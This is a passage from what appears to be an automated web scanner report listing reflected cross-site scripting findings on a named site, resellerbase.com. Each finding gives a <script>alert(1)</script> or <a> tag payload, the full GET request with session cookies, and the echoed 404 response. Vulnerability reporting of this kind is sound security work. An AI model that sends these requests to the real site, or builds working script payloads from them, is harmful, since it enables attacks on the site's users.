Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos5e22e<script>alert(1)</script>2c24ddad42f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.563. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8583c<script>alert(1)</script>e53750b73fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/search.php8583c<script>alert(1)</script>e53750b73fa?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php8583c<script>alert(1)</script>e53750b73fa?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.564. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 15ac0<a>fef086859d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search15ac0<a>fef086859d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search15ac0<a>fef086859d&opt=2 was not found on this server.</p>
...[SNIP]...

2.565. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 778a1<a>15d6fe302e2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...778a1<a>15d6fe302e2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...778a1<a>15d6fe302e2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.566. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c6f3f<script>alert(1)</script>b1a38381a1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c6f3f<script>alert(1)</script>b1a38381a1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c6f3f<script>alert(1)</script>b1a38381a1b=1 was not found on this server.</p>
...[SNIP]...

2.567. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 10146<a>2c0c8b56efe was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210146<a>2c0c8b56efe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210146<a>2c0c8b56efe was not found on this server.</p>
...[SNIP]...

2.568. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5acd9<script>alert(1)</script>9590df2a9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication5acd9<script>alert(1)</script>9590df2a9e0/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication5acd9<script>alert(1)</script>9590df2a9e0/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.569. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de3b2<script>alert(1)</script>aa1383a62fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandde3b2<script>alert(1)</script>aa1383a62fc/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandde3b2<script>alert(1)</script>aa1383a62fc/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.570. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64d83<script>alert(1)</script>081b422cf44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes64d83<script>alert(1)</script>081b422cf44/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes64d83<script>alert(1)</script>081b422cf44/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.571. http://www.resellerbase.com/communication/broadband/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4468<script>alert(1)</script>0a941fbb124 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/search.phpb4468<script>alert(1)</script>0a941fbb124?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.phpb4468<script>alert(1)</script>0a941fbb124?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.572. http://www.resellerbase.com/communication/broadband/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b683e<a>b9b194a2e64 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Searchb683e<a>b9b194a2e64&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...&Submit3=Searchb683e<a>b9b194a2e64&opt=2 was not found on this server.</p>
...[SNIP]...

2.573. http://www.resellerbase.com/communication/broadband/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d1669<a>5ee5010ac67 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/search.php?keyword=search...d1669<a>5ee5010ac67&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...d1669<a>5ee5010ac67&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.574. http://www.resellerbase.com/communication/broadband/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 628bb<script>alert(1)</script>f63702e0b9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2&628bb<script>alert(1)</script>f63702e0b9e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2&628bb<script>alert(1)</script>f63702e0b9e=1 was not found on this server.</p>
...[SNIP]...

2.575. http://www.resellerbase.com/communication/broadband/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 13c34<a>236373472b4 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=213c34<a>236373472b4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=213c34<a>236373472b4 was not found on this server.</p>
...[SNIP]...

2.576. http://www.resellerbase.com/communication/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a530<script>alert(1)</script>2109d23084c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication7a530<script>alert(1)</script>2109d23084c/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7a530<script>alert(1)</script>2109d23084c/googlepr.php was not found on this server.</p>
...[SNIP]...

2.577. http://www.resellerbase.com/communication/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8a15<script>alert(1)</script>23fa1f55420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/googlepr.phpc8a15<script>alert(1)</script>23fa1f55420 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/googlepr.phpc8a15<script>alert(1)</script>23fa1f55420 was not found on this server.</p>
...[SNIP]...

2.578. http://www.resellerbase.com/communication/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 587cf<a>0857d2c9eb0 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/googlepr.php?link_id=10587cf<a>0857d2c9eb0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/googlepr.php?link_id=10587cf<a>0857d2c9eb0 was not found on this server.</p>
...[SNIP]...

2.579. http://www.resellerbase.com/communication/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15133<script>alert(1)</script>4a39a8e4e5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/googlepr.php?15133<script>alert(1)</script>4a39a8e4e5f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/googlepr.php?15133<script>alert(1)</script>4a39a8e4e5f=1 was not found on this server.</p>
...[SNIP]...

2.580. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f186b<script>alert(1)</script>2ed3bc269fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationf186b<script>alert(1)</script>2ed3bc269fd/mobile-content/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationf186b<script>alert(1)</script>2ed3bc269fd/mobile-content/ was not found on this server.</p>
...[SNIP]...

2.581. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

